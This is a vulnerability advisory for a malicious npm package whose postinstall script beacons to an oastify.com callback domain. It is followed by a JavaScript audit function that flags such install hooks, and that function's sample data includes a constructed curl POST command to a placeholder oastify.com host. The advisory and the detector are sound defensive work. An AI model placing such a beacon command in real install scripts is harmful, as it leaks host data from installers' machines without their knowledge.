zer0onedatetool@1.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID: MAL-2026-5536
Ecosystem: npm
Summary
The postinstall lifecycle script in this package issues curl POST requests to a subdomain of oastify.com — the out-of-band callback domain operated by Burp Collaborator / Project Discovery's interactsh. On every npm install, the script triggers an outbound HTTP request to an attacker-controlled OOB endpoint, which is the canonical fingerprint of a dependency-confusion / supply-chain reconnaissance payload (verifying the package landed in a victim environment and beaconing identifying host information out). The destination is not associated with any legitimate package functionality.

Installer impact: any machine running npm install on this package automatically beacons to the attacker's OOB collector, leaking install-time host metadata and confirming code execution to the attacker.
Source: amazon-inspector (73fd05fda74bbf13c6275d4da0fa80fece821cad03fb2237ae74ed24309eab52)
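
A defender-side check for the pattern the summary describes, as an added example that is not part of the advisory or of any scanner's code: it audits a parsed package.json for install-time lifecycle scripts that reference an OOB callback domain. The watchlist constant, the function names and the sample manifests are assumptions constructed for illustration; only oastify.com comes from the advisory.

```javascript
// Assumed, non-exhaustive watchlist of OOB callback domains (only oastify.com is from the advisory).
const OOB_SUFFIXES = ["oastify.com"];
// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
const FETCHERS = /\b(curl|wget)\b/i;

// Collect hostnames from URLs and bare host-like tokens in a command string.
function hostsIn(command) {
  const hosts = new Set();
  const re = /(?:https?:\/\/)?((?:[a-z0-9-]+\.)+[a-z]{2,})/gi;
  for (const m of command.matchAll(re)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Match the domain itself or any subdomain, but not look-alikes such as "notoastify.com".
function isOobHost(host) {
  return OOB_SUFFIXES.some((s) => host === s || host.endsWith("." + s));
}

// manifest: a parsed package.json object. Returns one finding per suspicious install hook.
function auditManifest(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const hosts = hostsIn(cmd).filter(isOobHost);
    if (hosts.length === 0) continue;
    findings.push({
      package: `${manifest.name}@${manifest.version}`,
      hook,
      hosts,
      usesFetcher: FETCHERS.test(cmd),
    });
  }
  return findings;
}

// Constructed samples: names, subdomain and script bodies are placeholders, not the package's contents.
const suspicious = {
  name: "example-pkg", version: "1.0.0",
  scripts: { postinstall: "curl -X POST -d constructed-sample https://placeholder-id.oastify.com/" },
};
// The "test" script is not run by `npm install`, so it is out of scope for this check.
const benign = {
  name: "other-pkg", version: "2.3.4",
  scripts: { postinstall: "node scripts/build.js", test: "curl https://x.oastify.com" },
};
console.log(JSON.stringify(auditManifest(suspicious), null, 2));
console.log("benign findings:", auditManifest(benign).length);
```

To apply it to a real tree, read each `package.json` under `node_modules` and pass the parsed object to `auditManifest`; installing with `npm install --ignore-scripts` keeps lifecycle scripts from running while the audit is done.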